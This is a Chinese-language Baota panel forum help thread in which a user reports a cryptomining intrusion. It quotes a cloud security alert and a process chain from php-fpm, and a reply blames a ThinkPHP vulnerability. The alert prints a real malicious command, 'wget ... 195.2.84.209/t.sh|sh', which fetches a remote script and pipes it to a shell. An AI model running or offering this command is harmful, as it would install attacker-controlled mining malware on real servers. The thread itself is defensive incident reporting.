当前位置:论坛首页 > Linux面板 > 求助

【已解决】服务器被恶意脚本代码执行

发表在 Linux面板2022-9-14 09:58 [复制链接] 2 5247

本帖最后由 宝塔用户_gujpjy 于 2022-9-14 10:39 编辑

服务这两天被挖矿的盯上了,请问这个怎么解决?
这个如何找到源头?是从那里发起的请求的。


命令行: wget -q -O - 195.2.84.209/t.sh

进程PID: 4181000

进程文件名: wget

父进程ID: 4180999

父进程: bash

父进程文件路径: /usr/bin/bash

进程链:
-[3271829]  /www/server/panel/pyenv/bin/python3 /www/server/panel/BT-Panel
    -[4157434]  /etc/init.d/php-fpm-73 start
        -[4157438]  /www/server/php/73/sbin/php-fpm --daemonize --fpm-config /www/server/php/73/etc/php-fpm.conf --pid /www/server/php/73/var/run/php-fpm.pid
            -[4157442]  /www/server/php/73/sbin/php-fpm --daemonize --fpm-config /www/server/php/73/etc/php-fpm.conf --pid /www/server/php/73/var/run/php-fpm.pid
                -[4157475]  /www/server/php/73/sbin/php-fpm --daemonize --fpm-config /www/server/php/73/etc/php-fpm.conf --pid /www/server/php/73/var/run/php-fpm.pid
                    -[4170411]  /www/server/php/73/sbin/php-fpm --daemonize --fpm-config /www/server/php/73/etc/php-fpm.conf --pid /www/server/php/73/var/run/php-fpm.pid
                        -[4180999]  sh -c wget -q -O - 195.2.84.209/t.sh|sh

事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于bash、powershell、python),请立刻排查入侵来源。如果是您的运维行为,请选择忽略。


使用道具 举报 只看该作者 回复
发表于 2022-9-14 10:09:33 | 显示全部楼层
您好!这边建议可以找专业人员给您清除挖矿病毒!
使用道具 举报 回复 支持 反对
发表于 2022-9-14 10:35:19 | 显示全部楼层
找到原因是因为thinkphp的漏洞造成的,

https://blog.csdn.net/qq_35533398/article/details/108492823
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术免费分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表